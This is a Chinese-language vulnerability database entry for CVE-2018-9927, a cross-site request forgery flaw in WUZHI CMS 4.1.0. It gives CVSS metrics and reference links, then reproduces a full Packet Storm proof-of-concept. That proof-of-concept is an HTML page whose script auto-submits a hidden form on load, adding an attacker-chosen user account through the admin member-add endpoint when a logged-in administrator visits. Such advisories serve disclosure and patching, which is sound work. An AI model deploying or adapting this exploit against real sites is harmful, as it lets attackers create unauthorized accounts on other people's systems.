CVE-2018-9927
CVSS6.8
发布时间 :2018-04-10 02:29:00
修订时间 :2018-05-09 16:36:20
NMP    

[原文]An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-352 [跨站请求伪造(CSRF)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9927
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9927
(官方数据源) NVD

- 其它链接及资源

https://github.com/wuzhicms/wuzhicms/issues/128
(VENDOR_ADVISORY)  MISC  https://github.com/wuzhicms/wuzhicms/issues/128

- 漏洞信息 (F147141)

Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery (PacketStormID:F147141)
2018-04-11 00:00:00
taoge  
exploit,csrf
CVE-2018-9927
[点击下载]

Wuzhi CMS version 4.1.0 suffers from an add user cross site request forgery vulnerability.

# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0 
# CVE : CVE-2018-9927
  
An issue was discovered in WUZHI CMS 4.1.0.i1/4https://github.com/wuzhicms/wuzhicms/issues/128i1/4
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator logged in, open the csrf exp page.
  
  
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
 
 
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";  
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";  
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";  
fields += "<input type='hidden' name='info[mobile]' value='' />";  
fields += "<input type='hidden' name='modelids[]' value='10' />";  
fields += "<input type='hidden' name='info[groupid]' value='3' />";  
fields += "<input type='hidden' name='pids[]' value='0' />";  
fields += "<input type='hidden' name='pids[]' value='0' />";  
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />";  
fields += "<input type='hidden' name='avatar' value='' />";  
fields += "<input type='hidden' name='islock' value='0' />"; 
fields += "<input type='hidden' name='sys_name' value='0' />"; 
fields += "<input type='hidden' name='info[birthday]' value='' />";  
fields += "<input type='hidden' name='info[truename]' value='' />";  
fields += "<input type='hidden' name='info[sex]' value='0' />"; 
fields += "<input type='hidden' name='info[marriage]' value='0' />"; 
 
 
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>


    
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站